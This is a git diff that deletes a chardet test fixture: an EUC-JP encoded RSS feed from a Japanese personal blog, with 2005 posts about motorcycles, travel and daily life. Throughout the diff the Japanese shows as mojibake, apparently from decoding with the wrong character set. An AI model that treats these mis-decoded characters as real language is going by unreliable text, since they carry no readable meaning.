- - - - \ No newline at end of file diff --git a/chardet/tests/EUC-JP/ch.kitaguni.tv.xml b/chardet/tests/EUC-JP/ch.kitaguni.tv.xml deleted file mode 100644 index e0c4015..0000000 --- a/chardet/tests/EUC-JP/ch.kitaguni.tv.xml +++ /dev/null @@ -1,421 +0,0 @@ - - - - - ₪¢₪·₪¿₪ֿ₪¢₪·₪¿₪־ֹק₪¬¿ב₪¯ - http://ch.kitaguni.tv/u/8280 - ֻּ³₪ֶ»₪¬ֲח¹¥₪­₪₪־₪ֻ₪₪«₪₪«ֻ¬ּה₪ַ₪­₪₪₪dsnk-kata¡₪₪¿₪־ּ¾₪ע₪ֹ₪µ₪ף₪³¡ֻ₪¬¡¢ֻּ₪־ֲחֳֿ₪ע»׳₪₪₪ִ₪ִ¡¢ ¿´₪ֻ°₪ך₪ז₪¯₪ט₪·₪₪·»צ₪ע¡¢₪½₪³₪ֿ₪«₪ָ₪₪¯½ס₪­₪ִ₪¯₪ך₪₪¹¡£ ¢« ₪×₪ג₪·₪ם₪₪µ­»צ¡¢₪¢₪כ₪«₪¡© ₪³₪ף₪¥¢¥¿¥·₪ג₪ׂ₪ֳ₪½₪ך»²²ֳֳז¡£¥¯¥ך¥ֳ¥¯₪·₪ֶ₪¯₪ל₪¿₪י₪¦₪ל₪·₪₪₪¢צ - ja - dsnk-kata - - - - - - - - - - - - - - - - - - - - - - - - - - ₪¢₪¡ּסַ¯ - http://ch.kitaguni.tv/u/8280/%a5%b1%a1%bc%a5%bf%a5%a4%a4%ab%a4%e9%c2%cc%cf%c3/0000303281.html - - -÷£¡¢ֵֵ¼ײֶג₪־÷´ּמּס₪ט₪±ֲח»ױִ₪ך¹­¹נ₪ֳַ־₪ֳ₪¿¡£ - -»ה₪ֳ₪ֶֽטַ¯¸וּס¡ִ - - -₪½₪ל₪ֳ₪ֶ - - - -÷£ַ¯₪ֻּֿס₪ְ₪ֳ₪¿¡£ - - - -₪ֹ₪×₪ך₪ַ¡ִ - - -ֽטַ¯₪ֿ₪ֱ₪ֳ₪¿₪¡¥¥·₪ֳ₪ֶ₪³₪ָ₪«₪·₪י¡£ - - -₪₪₪ה₪₪₪ה¡¢÷£ַ¯₪ְ₪ֳ₪ֶ¥ײ¥ם¥°₪ה₪י₪־₪×₪«₪²₪ַ₪₪₪₪½׀²ס₪₪₪ֿ₪¢₪ֳ₪¿₪·¡¢ֲ¾₪ֻ₪ג₪₪₪₪₪³₪ָ₪¿₪¯₪µ₪ף₪¢₪ך₪₪·₪¿¡£ - -₪·₪«₪·₪³₪־ּסַ¯₪־ֹ½₪ע¸«₪כ₪ָ¡¢½ק30ֲו₪ֳ₪ֶ₪₪ָ₪ף₪ֹּסַ¯₪ְ₪¡£₪ֿ₪¡¡£ - - dsnk-kata - 2005-12-22T20:19:00+09:00 - ÷£¡¢ֵֵ¼ײֶג₪־÷´ּמּס₪ט₪±ֲח»ױִ₪ך¹­¹נ₪ֳַ־₪ֳ₪¿¡£

    -

    »ה₪ֳ₪ֶֽטַ¯¸וּס¡ִ

    -

    ₪½₪ל₪ֳ₪ֶ

    -

    ÷£ַ¯₪ֻּֿס₪ְ₪ֳ₪¿¡£

    -

    ₪ֹ₪×₪ך₪ַ¡ִ

    -

    ֽטַ¯₪ֿ₪ֱ₪ֳ₪¿₪¡¥¥·₪ֳ₪ֶ₪³₪ָ₪«₪·₪י¡£

    -

    ₪₪₪ה₪₪₪ה¡¢÷£ַ¯₪ְ₪ֳ₪ֶ¥ײ¥ם¥°₪ה₪י₪־₪×₪«₪²₪ַ₪₪₪₪½׀²ס₪₪₪ֿ₪¢₪ֳ₪¿₪·¡¢ֲ¾₪ֻ₪ג₪₪₪₪₪³₪ָ₪¿₪¯₪µ₪ף₪¢₪ך₪₪·₪¿¡£

    -

    ₪·₪«₪·₪³₪־ּסַ¯₪־ֹ½₪ע¸«₪כ₪ָ¡¢½ק30ֲו₪ֳ₪ֶ₪₪ָ₪ף₪ֹּסַ¯₪ְ₪¡£₪ֿ₪¡¡£

    -]]>
    -
    - - ₪ג₪¦₪¹₪°¥¯¥ך¥¹¥¥¹₪ְ₪ֽ₪§ - http://ch.kitaguni.tv/u/8280/%a5%b1%a1%bc%a5%bf%a5%a4%a4%ab%a4%e9%c2%cc%cf%c3/0000302974.html - - - -ָ±₪עְ₪ֳ₪¿µ¢₪ך¡¢¸¶½ֹ±״ֲ¦₪־ֳ²¼ִּ₪ךֶ‏₪ך¸‎₪ע»£±ֶ¡× - dsnk-kata - 2005-12-21T21:26:00+09:00 - ֳ²¼ִּ₪ךֶ‏₪ך¸‎₪־¥¯¥ך¥¹¥¥¹¾‏₪ך
    -ָ±₪עְ₪ֳ₪¿µ¢₪ך¡¢¸¶½ֹ±״ֲ¦₪־ֳ²¼ִּ₪ךֶ‏₪ך¸‎₪ע»£±ֶ¡×

    -]]>
    -
    - - ֳ־¾²₪״₪«₪¨₪ם₪¦¡£ - http://ch.kitaguni.tv/u/8280/%a5%b1%a1%bc%a5%bf%a5%a4%a4%ab%a4%e9%c2%cc%cf%c3/0000302927.html - - -₪¢₪¡¡¢¥¢¥¿¥·₪ְ₪ֳ₪ֶµ¢₪ך₪¿₪₪₪ט¡£¡£¡£ -¡½׀¿ֳָֿ₪¸₪ד₪₪₪₪±₪ֹ₪ֽ¡ֻ - -÷£₪₪µ₪ֻ¡¢»ֽ‎ָ¬‎₪«₪י¡¢¡ײ₪«₪¨₪ם₪¦¡׳¡ײֳ־¾²₪״₪«₪¨₪ם₪¦¡£¡׳₪ָֽ¶ַֿ₪µ₪ל₪ֶ₪₪¹¡£ - -₪ִ₪₪ך¡¢ֵװ¿´₪־ָ‏ֶֽ±¡₪ֻ¸‏₪«₪¦₪₪¯¡¢ִֵ±אֵװ»װְ‏₪ֻ¾ט₪ֳ₪ֶ₪כ₪־₪ַ₪¹₪¬¡¢»ה₪¬¾ט₪ֳ₪ֶ₪כֵֵ¼ײ₪ֿAIR DO₪־¥­¥ד¥ף¥¡¼¥ף¹­¹נ₪ַ₪₪₪ֳ₪ׁ₪₪₪₪־₪ֽ¡£ - -2006ַ¯2·מ10ֶ₪«₪יֵלµ‏¡½קֻ‏ּ½¢¹ׂ¡£ - -ֵ₪־ֶ»ֵל¡ִ₪×₪©¡¢ֳ־¾²ֿ¢»³₪ְ¡£־®ֹ¹₪ְ¡£¸¸׀₪ְ¡£ֳֻ₪־־₪ְ¡£ -₪¢₪¡₪¢¡¢₪₪¿¥¦¥£¥כ¥¹₪¬³טְ­²½₪·₪ֶ₪­₪¿₪ן¡ִ - - dsnk-kata - 2005-12-21T18:37:00+09:00 - ₪¢₪¡¡¢¥¢¥¿¥·₪ְ₪ֳ₪ֶµ¢₪ך₪¿₪₪₪ט¡£¡£¡£
    -¡½׀¿ֳָֿ₪¸₪ד₪₪₪₪±₪ֹ₪ֽ¡ֻ

    -

    ÷£₪₪µ₪ֻ¡¢»ֽ‎ָ¬‎₪«₪י¡¢¡ײ₪«₪¨₪ם₪¦¡׳¡ײֳ־¾²₪״₪«₪¨₪ם₪¦¡£¡׳₪ָֽ¶ַֿ₪µ₪ל₪ֶ₪₪¹¡£

    -

    ₪ִ₪₪ך¡¢ֵװ¿´₪־ָ‏ֶֽ±¡₪ֻ¸‏₪«₪¦₪₪¯¡¢ִֵ±אֵװ»װְ‏₪ֻ¾ט₪ֳ₪ֶ₪כ₪־₪ַ₪¹₪¬¡¢»ה₪¬¾ט₪ֳ₪ֶ₪כֵֵ¼ײ₪ֿAIR DO₪־¥­¥ד¥ף¥¡¼¥ף¹­¹נ₪ַ₪₪₪ֳ₪ׁ₪₪₪₪־₪ֽ¡£

    -

    2006ַ¯2·מ10ֶ₪«₪יֵלµ‏¡½קֻ‏ּ½¢¹ׂ¡£

    -

    ֵ₪־ֶ»ֵל¡ִ₪×₪©¡¢ֳ־¾²ֿ¢»³₪ְ¡£־®ֹ¹₪ְ¡£¸¸׀₪ְ¡£ֳֻ₪־־₪ְ¡£
    -₪¢₪¡₪¢¡¢₪₪¿¥¦¥£¥כ¥¹₪¬³טְ­²½₪·₪ֶ₪­₪¿₪ן¡ִ

    -]]>
    -
    - - ¥ֽ¥¿₪ֿ»׳₪₪ֹג₪«₪ף₪ְ»‏₪¬¾¡ֹי¡© - http://ch.kitaguni.tv/u/8280/%c5%cc%c1%b3%a4%ca%a4%eb%a4%de%a4%de%a4%cb/0000300649.html - - -÷£ֶ₪־»ֵ»צ₪־¹ח₪₪´ײ¡¢¥ָ¥₪¥ל₪ֻג₪₪₪ֶ₪כ₪ָ₪­₪ֻ₪ױ₪ָ₪ׂ₪י₪ב₪₪₪¿(... - dsnk-kata - 2005-12-14T21:24:00+09:00 - ÷£ֶ₪־»ֵ»צ₪־¹ח₪₪´ײ¡¢¥ָ¥₪¥ל₪ֻג₪₪₪ֶ₪כ₪ָ₪­₪ֻ₪ױ₪ָ₪ׂ₪י₪ב₪₪₪¿(!)

    -

    ₪×₪ס¢₪³₪ל¥ײ¥ם¥°¥ֽ¥¿₪ְ₪ט¡ֱ¡×
    -₪½₪·₪ֶ₪³₪ל₪₪יֻטֶ₪ַ₪ג½ס₪±₪כ₪«₪ג¡×

    -

    ₪½₪·₪ֶ¶ָּ³₪ֻּב₪ֳ₪¿¡£¡£
    -¡÷£₪ג₪₪ְ₪×»ֵ»צֳז¡¦¡¦¡¦¡ֻ

    -

    ₪µ₪ֳ₪­¡¢₪ױ₪ָ¡ײµ₪¬ֵ¾´¹₪ֻ¥ײ¥ם¥°₪ַ₪ג½ס₪¯₪«₪¡¡¦¡¦¡¦¡׳₪ָ»׳₪ֳ₪¿₪י¡¢ֳכ´ײ₪ׂ₪י₪ב₪₪₪¿₪³₪ָ₪¬₪ׂ₪ָ₪ֳ₪ִ₪ג»׳₪₪½׀₪»₪₪₪ (TT)

    -

    ¥ֽ¥¿₪ֿ¡¢₪ׂ₪י₪ב₪₪₪¿₪ָ₪­₪ֻ¥ב¥ג₪י₪₪₪₪ָ₪ְ₪ב₪ַ₪¹₪ֽ¡־¡ֻ

    -

    ¡¦¡¦¡¦₪ָ¸ֲָ©₪ֻ₪ג¡¢₪³₪ף₪¥¥±₪ע¥ֽ¥¿₪ֻ½ס₪₪₪¿¥¢¥¿¥·¡£

    -

    ÷ַ¸ו₪ֻ₪ֱ₪ח₪ֳ₪ָ¶«₪ף₪ַ₪×₪­₪₪¹¡£
    -¥ך¥¢¥כ₪ֻ₪ֿ¶«₪ײ₪ֹ₪³₪ם₪«¡¢₪₪«₪₪«¸‎₪ֻ₪ֿ½׀₪»₪₪₪₪־₪ַ¡£

    -

    ¥׀¥¡¡¼¥«¡×¡×¡×
    -¡¢¬½ס₪₪₪ֶ₪כ¥¢¥¿¥·₪¬¥׀¥«₪₪¿₪₪₪ְ ^^;¡ֻ
    -
    ֲ³₪­₪עֶֹ₪א¡ִ¡ִ

    -]]>
    -
    - - ₪×₪₪₪₪¬¸ְ₪¦₪₪ט¡ִ - http://ch.kitaguni.tv/u/8280/%a5%b1%a1%bc%a5%bf%a5%a4%a4%ab%a4%e9%c2%cc%cf%c3/0000298643.html - - -₪«₪«₪ך₪ִ₪±₪־¼×ֹ¡²₪¬₪¢₪כ¥׃¥כ₪־¥¨¥ל¥¡¼¥¿ֶג₪־ֽמ½ס₪­¡¢¡ײ¥¥¡¼₪־₪ֽ₪¨¥¬¥­₪ֹ₪ג₪¬¡׳₪ַ₪¹₪ָ¡£ - - -¡¦¡¦¡¦ֽמ½ס₪­₪¹₪כ₪ט¡¼₪¥ה¥ִ₪ֻ¸ְ₪ן₪ל₪¿₪«₪₪₪₪ה₪ֽ¡£ - dsnk-kata - 2005-12-09T07:04:00+09:00 - ₪«₪«₪ך₪ִ₪±₪־¼×ֹ¡²₪¬₪¢₪כ¥׃¥כ₪־¥¨¥ל¥¡¼¥¿ֶג₪־ֽמ½ס₪­¡¢¡ײ¥¥¡¼₪־₪ֽ₪¨¥¬¥­₪ֹ₪ג₪¬¡׳₪ַ₪¹₪ָ¡£
    -ֽמ½ס₪­¡ײ¥¥¡¼₪־₪ֽ₪¨¥¬¥­₪ֹ₪ג₪¬¡׳

    -

    ¡¦¡¦¡¦ֽמ½ס₪­₪¹₪כ₪ט¡¼₪¥ה¥ִ₪ֻ¸ְ₪ן₪ל₪¿₪«₪₪₪₪ה₪ֽ¡£

    -]]>
    -
    - - ְֹמ±״¹½ֶג₪־¥¥¹¥ָ - http://ch.kitaguni.tv/u/8280/0000291277.html - - - -₪×₪×¡× ₪«₪ן₪₪₪₪¢צ -²¿₪«ֱק₪ך₪¿₪¯₪₪ך₪₪¹¡£ -₪ֹ₪ף₪¥¥¹¥ָ₪ֶֻ‏₪ל₪ט₪¦₪¬¡¢ֱק₪ךְט₪ֻ₪ֿ¬₪«₪י₪₪₪₪ף₪ְ₪±₪ֹ (^^;) - dsnk-kata - 2005-11-19T16:59:00+09:00 - 01.jpg
    -₪×₪×¡× ₪«₪ן₪₪₪₪¢צ
    -²¿₪«ֱק₪ך₪¿₪¯₪₪ך₪₪¹¡£
    -₪ֹ₪ף₪¥¥¹¥ָ₪ֶֻ‏₪ל₪ט₪¦₪¬¡¢ֱק₪ךְט₪ֻ₪ֿ¬₪«₪י₪₪₪₪ף₪ְ₪±₪ֹ (^^;)

    -]]>
    -
    - - ¥ן¥¿¥·₪־°¦¼ײ - http://ch.kitaguni.tv/u/8280/%a4%bf%a4%d3/0000288775.html - - -½׀ָ¯ֱ°₪ֻ¡¦¡¦¡¦¡₪₪ְ²ָ₪ֻ₪₪₪¿₪־₪«₪ט¡¦¡¦¡ֻ - -»ה₪־TW200₪ֿ¡¢¥­¥א¥¿¥¯₪¬¥ֹ¥י¥₪ַ¾ט₪ֳ₪ֶ₪ֶ°ל»‏¥ײ¡¼¥א₪ֻ₪₪ֳ₪¿₪־₪ט₪ך¸ֵ₪₪1993¥ג¥ַ¥כ₪ַ₪¹¡£ -₪³₪־¥¡¼¥¸₪־1993¥ג¥ַ¥כ₪ָ₪₪ֳ₪¿₪¯ֶ±₪¸>> -ֳ±₪ֻ¡¢¿ִָ¹152cm₪־»ה₪ֻ₪ָ₪ֳ₪ֲֶ­₪ִ₪­₪־₪ט₪₪¥×¥ױ¼ײ₪עֳµ₪·₪¿₪י¡¢¸¶ֹױ₪ַ₪₪₪ִ₪ג₪×ְ₪ֳֿ₪ֻ₪₪ֳ₪ֶ₪₪₪כ¥׀¥₪¥¯²°₪µ₪ף₪ֻ₪³₪־»ׂ₪¬ּ²₪ֳ₪ֶ₪¿₪־₪ַַד₪₪¼ץ₪±₪₪·₪¿¡£ -TW₪ֿ¥«¥¹¥¿¥¥₪¥÷₪·₪ֶ¡¢¥×¥ך¥¸¥¥כ₪־¾ץֲײ₪¬ְ׳·ֱ₪ג₪₪¯₪₪ֳ₪ֶ₪כ₪³₪ָ₪¬ֲ¿₪₪ֳז¡¢₪¦₪ֱ₪־»ׂ₪ֿ¡ײ₪ֹ¡×₪₪ֳ₪µ₪י₪ְ₪ֽ¡׳₪ָ־¹ְט₪ַ¸ְ₪ן₪ל₪¿₪¯₪י₪₪¡¢¥׳¥ל¡¼¥ף₪ַ₪¹¡¾׀¡ֻ -־¹¥ל¥¡¼¥ָ₪ַ¼ּ¿¿¥¢¥ֳ¥׳₪·₪₪­₪ד¡£ - -₪³₪ל₪־ֱ°₪ֻ₪ֶֿ´₪ל₪־¥«¥ן¥µ¥­KDX200¡¼ּ¿¿₪₪·¡ֻ₪ַ₪·₪¿₪¬¡¢ַ¡²¿₪»₪ף¥ן¥¿¥·₪ֻ₪ַֿ״₪¬¹ג₪¹₪®₪ַ¡¢₪ָ₪ֶ₪ג¥ִ¡¼¥ך¥ף¥°₪ֻ₪₪ֹ¹װ₪¯µ₪₪ֻ₪₪ל₪₪»₪ף₪ַ₪·₪¿¡£ -¸¶ֹױ₪ַ20¬₪₪ֹ₪־¶׀ּ³ְט₪ֻ¾ט₪ֳ₪ֶ₪₪₪¯₪־₪ַ₪ג¥ֹ¥­¥ֹ¥­₪ְ₪ֳ₪¿₪ג₪־₪ַ¡£ -ֻ‏ֲ­₪ֻ¾ט₪ל₪ג₪»₪÷¡¢₪¢₪כֵֶנֶס₪ֱֻר₪₪¡¢·»¡₪ֶֻֿ₪±₪¿₪יֽגֶ₪¹₪°¥÷¥¿¥¥ם¾ץֲײ₪ַ¸«₪ִ₪«₪ך¡¢¥­¥ל¥₪₪ֻ½₪ֽ‎₪·¡₪ג₪ֱ₪ם₪ף¼«¢₪ַ¡¦¡¦¡¦¡ֻ₪½₪ל₪«₪י₪₪ג₪₪¯¸½°¦¼ײ₪־TW200₪ָ°ת₪­´¹₪¨₪ֻ¼ך₪·₪₪·₪¿¡£ -¿פ¥צ·מ₪ֶַףֲ«»°¸₪₪¬₪יַה₪ל₪¿₪ָ¹₪­₪₪·₪¿₪¬¡¢KDX₪¯₪ף₪¬ֻ‏ֲ­₪₪₪¯₪₪ֹ¾ט₪ך₪³₪₪·₪ֶ₪¯₪ל₪כ‎₪ְ₪ֳ₪¿₪י₪ט₪₪₪¡¢₪ָ÷£₪ַ₪ג»׳₪₪₪₪¹¡£ - - -ֲ³₪­₪עֶֹ₪א¡ִ¡ִ - - - dsnk-kata - 2005-11-12T11:42:00+09:00 - ½׀ָ¯ֱ°₪ֻ¡¦¡¦¡¦¡₪₪ְ²ָ₪ֻ₪₪₪¿₪־₪«₪ט¡¦¡¦¡ֻ

    -

    »ה₪־TW200₪ֿ¡¢¥­¥א¥¿¥¯₪¬¥ֹ¥י¥₪ַ¾ט₪ֳ₪ֶ₪ֶ°ל»‏¥ײ¡¼¥א₪ֻ₪₪ֳ₪¿₪־₪ט₪ך¸ֵ₪₪1993¥ג¥ַ¥כ₪ַ₪¹¡£
    -₪³₪־¥¡¼¥¸₪־1993¥ג¥ַ¥כ₪ָ₪₪ֳ₪¿₪¯ֶ±₪¸>>
    -ֳ±₪ֻ¡¢¿ִָ¹152cm₪־»ה₪ֻ₪ָ₪ֳ₪ֲֶ­₪ִ₪­₪־₪ט₪₪¥×¥ױ¼ײ₪עֳµ₪·₪¿₪י¡¢¸¶ֹױ₪ַ₪₪₪ִ₪ג₪×ְ₪ֳֿ₪ֻ₪₪ֳ₪ֶ₪₪₪כ¥׀¥₪¥¯²°₪µ₪ף₪ֻ₪³₪־»ׂ₪¬ּ²₪ֳ₪ֶ₪¿₪־₪ַַד₪₪¼ץ₪±₪₪·₪¿¡£
    -TW₪ֿ¥«¥¹¥¿¥¥₪¥÷₪·₪ֶ¡¢¥×¥ך¥¸¥¥כ₪־¾ץֲײ₪¬ְ׳·ֱ₪ג₪₪¯₪₪ֳ₪ֶ₪כ₪³₪ָ₪¬ֲ¿₪₪ֳז¡¢₪¦₪ֱ₪־»ׂ₪ֿ¡ײ₪ֹ¡×₪₪ֳ₪µ₪י₪ְ₪ֽ¡׳₪ָ־¹ְט₪ַ¸ְ₪ן₪ל₪¿₪¯₪י₪₪¡¢¥׳¥ל¡¼¥ף₪ַ₪¹¡¾׀¡ֻ
    -־¹¥ל¥¡¼¥ָ₪ַ¼ּ¿¿¥¢¥ֳ¥׳₪·₪₪­₪ד¡£

    -

    ₪³₪ל₪־ֱ°₪ֻ₪ֶֿ´₪ל₪־¥«¥ן¥µ¥­KDX200¡¼ּ¿¿₪₪·¡ֻ₪ַ₪·₪¿₪¬¡¢ַ¡²¿₪»₪ף¥ן¥¿¥·₪ֻ₪ַֿ״₪¬¹ג₪¹₪®₪ַ¡¢₪ָ₪ֶ₪ג¥ִ¡¼¥ך¥ף¥°₪ֻ₪₪ֹ¹װ₪¯µ₪₪ֻ₪₪ל₪₪»₪ף₪ַ₪·₪¿¡£
    -¸¶ֹױ₪ַ20¬₪₪ֹ₪־¶׀ּ³ְט₪ֻ¾ט₪ֳ₪ֶ₪₪₪¯₪־₪ַ₪ג¥ֹ¥­¥ֹ¥­₪ְ₪ֳ₪¿₪ג₪־₪ַ¡£
    -ֻ‏ֲ­₪ֻ¾ט₪ל₪ג₪»₪÷¡¢₪¢₪כֵֶנֶס₪ֱֻר₪₪¡¢·»¡₪ֶֻֿ₪±₪¿₪יֽגֶ₪¹₪°¥÷¥¿¥¥ם¾ץֲײ₪ַ¸«₪ִ₪«₪ך¡¢¥­¥ל¥₪₪ֻ½₪ֽ‎₪·¡₪ג₪ֱ₪ם₪ף¼«¢₪ַ¡¦¡¦¡¦¡ֻ₪½₪ל₪«₪י₪₪ג₪₪¯¸½°¦¼ײ₪־TW200₪ָ°ת₪­´¹₪¨₪ֻ¼ך₪·₪₪·₪¿¡£
    -¿פ¥צ·מ₪ֶַףֲ«»°¸₪₪¬₪יַה₪ל₪¿₪ָ¹₪­₪₪·₪¿₪¬¡¢KDX₪¯₪ף₪¬ֻ‏ֲ­₪₪₪¯₪₪ֹ¾ט₪ך₪³₪₪·₪ֶ₪¯₪ל₪כ‎₪ְ₪ֳ₪¿₪י₪ט₪₪₪¡¢₪ָ÷£₪ַ₪ג»׳₪₪₪₪¹¡£

    -


    ֲ³₪­₪עֶֹ₪א¡ִ¡ִ

    -]]>
    -
    - - ְֶּ₪ֿ4ַ¯₪ײ₪ך₪־¥ִ¡¼¥ך¥ף¥°¡× - http://ch.kitaguni.tv/u/8280/%a4%bf%a4%d3/0000288526.html - - -8·מֻצ°¹¡¢¶ָּ³₪ֿ₪¿₪ֶ₪³₪א₪·¡¢¿·₪·₪¯²ֳ₪ן₪ֳ₪¿¥°¥כ¡¼¥׳¥ב¥ף¥׀¡¼₪ֻ¼ך₪³₪÷₪ֳ₪ֶ¡¢₪³₪ל₪₪ַ₪־¼ׂ²ס¿ְֽ¸³ט₪ַ₪«₪ִ₪ֶ₪₪₪¥¹¥ָ¥ל¥¹₪עֽ¿₪¨₪י₪ל¡¢¡ײ¡¦¡¦¡¦²¹ְפ¹װ₪­₪¿₪₪¡¦¡¦¡¦¡׳₪ָ»׳₪ֳ₪ֶ₪×₪ך₪₪·₪¿¡£ - -₪½₪ף₪₪¢₪כֶ¡¢ֱך‎₪«₪י11·מ12ֶ¡ֱ13ֶ₪ֿ²ס¼ׂ₪־ֹפֶג¡²ֶג¡©₪ֹ₪ֳ₪ֱ₪ַ₪ג₪₪₪₪₪ה¡ֻ־¹¹װ₪ֻ¹װ₪¯₪ָ¹₪­¡¢₪µ₪י₪ֻ¡ײ¥¢¥¿¥·₪ג²¹ְפ₪ֻ¹װ₪­₪¿₪₪₪ף₪¸₪ד₪₪¡×¡׳₪ָ»׳₪ֳ₪¿₪י₪ׂ₪י₪ב₪₪₪¿¡£ - -°ל¿ֽ²ָ₪ַ־±¼יָײ₪·₪ֶ₪כ₪¯₪י₪₪₪₪י¡¢¥ן¥¿¥·₪ֿ¥ן¥¿¥·₪ַ¹װ₪±₪׀₪₪₪₪₪־₪ְ¡× -₪¦₪ף¡¢ּ½ך²¹ְפ₪־¥ז¡¼¥¹¥¥¹¥ֶ¥כ₪ֻ¹װ₪³₪¦¡£₪ַ¡¢¿®½£¶¾ַ‏₪ָ₪¯₪כ₪₪×₪ֿ₪®₪ע¿©₪₪ֶ₪¯₪כ₪¼₪₪¡£ - -₪³₪־÷¡¢3ַ¯ֱ°₪ֻ¼«ַוְױ₪¬ְ₪ל₪ֶ₪³₪־‎¡¢¼ֲ²ָ₪ַּ²₪ֳ₪ֶ₪₪₪¿°¦¼ײ₪גֿ¢₪ל₪ֶ¹װ₪³₪¦¡× - -₪ָ₪₪₪¦₪³₪ָ₪ַ₪₪÷¡¢°¦¼ײTW200₪עµ¯₪³₪¹₪ָ₪³₪ם₪«₪י»ֿ₪₪ך₪₪·₪¿¡£ - - -ֲ³₪­₪עֶֹ₪א¡ִ¡ִ - - - dsnk-kata - 2005-11-11T16:16:00+09:00 - 8·מֻצ°¹¡¢¶ָּ³₪ֿ₪¿₪ֶ₪³₪א₪·¡¢¿·₪·₪¯²ֳ₪ן₪ֳ₪¿¥°¥כ¡¼¥׳¥ב¥ף¥׀¡¼₪ֻ¼ך₪³₪÷₪ֳ₪ֶ¡¢₪³₪ל₪₪ַ₪־¼ׂ²ס¿ְֽ¸³ט₪ַ₪«₪ִ₪ֶ₪₪₪¥¹¥ָ¥ל¥¹₪עֽ¿₪¨₪י₪ל¡¢¡ײ¡¦¡¦¡¦²¹ְפ¹װ₪­₪¿₪₪¡¦¡¦¡¦¡׳₪ָ»׳₪ֳ₪ֶ₪×₪ך₪₪·₪¿¡£

    -

    ₪½₪ף₪₪¢₪כֶ¡¢ֱך‎₪«₪י11·מ12ֶ¡ֱ13ֶ₪ֿ²ס¼ׂ₪־ֹפֶג¡²ֶג¡©₪ֹ₪ֳ₪ֱ₪ַ₪ג₪₪₪₪₪ה¡ֻ־¹¹װ₪ֻ¹װ₪¯₪ָ¹₪­¡¢₪µ₪י₪ֻ¡ײ¥¢¥¿¥·₪ג²¹ְפ₪ֻ¹װ₪­₪¿₪₪₪ף₪¸₪ד₪₪¡×¡׳₪ָ»׳₪ֳ₪¿₪י₪ׂ₪י₪ב₪₪₪¿¡£

    -

    °ל¿ֽ²ָ₪ַ־±¼יָײ₪·₪ֶ₪כ₪¯₪י₪₪₪₪י¡¢¥ן¥¿¥·₪ֿ¥ן¥¿¥·₪ַ¹װ₪±₪׀₪₪₪₪₪־₪ְ¡×
    -₪¦₪ף¡¢ּ½ך²¹ְפ₪־¥ז¡¼¥¹¥¥¹¥ֶ¥כ₪ֻ¹װ₪³₪¦¡£₪ַ¡¢¿®½£¶¾ַ‏₪ָ₪¯₪כ₪₪×₪ֿ₪®₪ע¿©₪₪ֶ₪¯₪כ₪¼₪₪¡£

    -

    ₪³₪־÷¡¢3ַ¯ֱ°₪ֻ¼«ַוְױ₪¬ְ₪ל₪ֶ₪³₪־‎¡¢¼ֲ²ָ₪ַּ²₪ֳ₪ֶ₪₪₪¿°¦¼ײ₪גֿ¢₪ל₪ֶ¹װ₪³₪¦¡×

    -

    ₪ָ₪₪₪¦₪³₪ָ₪ַ₪₪÷¡¢°¦¼ײTW200₪עµ¯₪³₪¹₪ָ₪³₪ם₪«₪י»ֿ₪₪ך₪₪·₪¿¡£

    -


    ֲ³₪­₪עֶֹ₪א¡ִ¡ִ

    -]]>
    -
    - - ¸×₪־²₪¬²¼₪ך₪¿¡¦¡¦¡¦ - http://ch.kitaguni.tv/u/8280/%a5%b9%a5%dd%a1%bc%a5%c4/%a5%b5%a5%c3%a5%ab%a1%bc/0000284464.html - - -₪×₪©¡¢FCֵלµ‏¡¢µ׳₪·₪ײ₪ך₪־¥¡¼¥אּ£¥¹¥¿¾¡ֽר₪ַ¡¢₪³₪³¿פ¥צ·מ₪÷₪ֳ₪ָ¼«¬₪־¿´₪ֻ°ֵ₪₪±ֶ₪ע₪×₪ָ₪·₪ֶ₪­₪¿¹³₪־´םµ¡₪¬µמ₪ֳ₪¿₪ט₪¦₪ַ₪¹¡× -ֳֶ₪ֻ÷£ֶּ₪ֹֻױ₪₪₪¿₪־₪ֿ¡¢¥ױ¥¸¡£ -²¿₪«¾ט₪ך°₪ֳ₪ֶ₪כ¡©₪ָ»׳₪¦₪¯₪י₪₪¡¢¹¶¼י₪ָ₪גַק־ֿ₪ַ₪·₪¿¡£ - - -»מ¹ח½×־»¸ו¡¢¥׀¥ֳ¥¯¥¹¥¿¥ף¥ֹ₪ֻ°§»¢₪ֻ¹װ₪ֳ₪¿FCֵלµ‏₪־ֱ×¼ך₪¿₪ֱ -ֲ³₪­₪עֶֹ₪א¡ִ¡ִ - - - dsnk-kata - 2005-10-31T00:26:00+09:00 - ₪×₪©¡¢FCֵלµ‏¡¢µ׳₪·₪ײ₪ך₪־¥¡¼¥אּ£¥¹¥¿¾¡ֽר₪ַ¡¢₪³₪³¿פ¥צ·מ₪÷₪ֳ₪ָ¼«¬₪־¿´₪ֻ°ֵ₪₪±ֶ₪ע₪×₪ָ₪·₪ֶ₪­₪¿¹³₪־´םµ¡₪¬µמ₪ֳ₪¿₪ט₪¦₪ַ₪¹¡×
    -ֳֶ₪ֻ÷£ֶּ₪ֹֻױ₪₪₪¿₪־₪ֿ¡¢¥ױ¥¸¡£
    -²¿₪«¾ט₪ך°₪ֳ₪ֶ₪כ¡©₪ָ»׳₪¦₪¯₪י₪₪¡¢¹¶¼י₪ָ₪גַק־ֿ₪ַ₪·₪¿¡£

    -

    »מ¹ח½×־»¸ו
    -»מ¹ח½×־»¸ו¡¢¥׀¥ֳ¥¯¥¹¥¿¥ף¥ֹ₪ֻ°§»¢₪ֻ¹װ₪ֳ₪¿FCֵלµ‏₪־ֱ×¼ך₪¿₪ֱ
    -
    ֲ³₪­₪עֶֹ₪א¡ִ¡ִ

    -]]>
    -
    - - ¶ץ - http://ch.kitaguni.tv/u/8280/%a5%b1%a1%bc%a5%bf%a5%a4%a4%ab%a4%e9%c2%cc%cf%c3/0000277637.html - - - -ִּ¶׀ֵ׃ֳז₪ֻ·ֲָ׃₪־¥«¥ב¥י₪ַ»£₪ֳ₪¿ְ¾₪־¶ץ¡£ -ֶש´ד₪¸₪ד₪¦₪ֳ₪¹₪יֹ»־»³₪¬¸«₪¨₪ֶ₪כ₪±₪ֹ¡¢¬₪«₪י₪₪₪₪ְ₪ם₪¦₪¡ִ -₪ב₪¶₪₪·¥ֶ¥ל¥׃₪־₪¦₪י₪₪₪₪ַ¥י¥ֳ¥­¡¼¥¥₪¥ף¥ָ₪ֿ¶ץ₪־¼ּ¿¿₪ֳ₪ֶ₪³₪ָ₪ְ₪ֳ₪¿₪ף₪ַ¡£ - dsnk-kata - 2005-10-13T07:47:00+09:00 - ¶ץ₪־¼ּ¿¿
